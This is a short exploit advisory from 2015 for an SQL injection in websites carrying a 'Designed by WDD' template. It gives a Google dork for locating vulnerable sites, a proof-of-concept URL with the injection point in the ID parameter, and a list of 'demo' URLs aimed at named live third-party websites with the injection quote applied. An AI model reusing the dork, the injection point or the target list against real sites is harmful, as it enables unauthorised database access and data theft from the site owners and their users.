#############################In The Name Of God############################## # # Exploit Title : Designed by WDD SQL injection Vulnerability # Exploit Author : modiret # Vendor Homepage : http://www.wddgroup.com/ # Google Dork : intext:"Designed by WDD" inurl:products.php? # Date: 28 Dec 2015 # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # PoC: # http://www.qaftin.com/products.php?Type=more&KindID=10&ID=[SQLI] # # Demos : # # http://www.qaftin.com/products.php?Type=more&KindID=10&ID=39%27 # http://ee.bureauveritas.com.tw/products.php?KindID=1%27 # http://www.mblock.com.tw/products.php?KindID=1&ID=111%27 # http://www.mblock.com.tw/products.php?KindID=1&ID=8%27 # http://www.microtekusa.com/products.php/products.php?KindID=105&ID=357%27 # http://www.wddseo.com/mblock/products.php?KindID=2&ID=32%27 ###################### # Contact Me: Yahoo messenger(amodiret@yahoo.com) ######################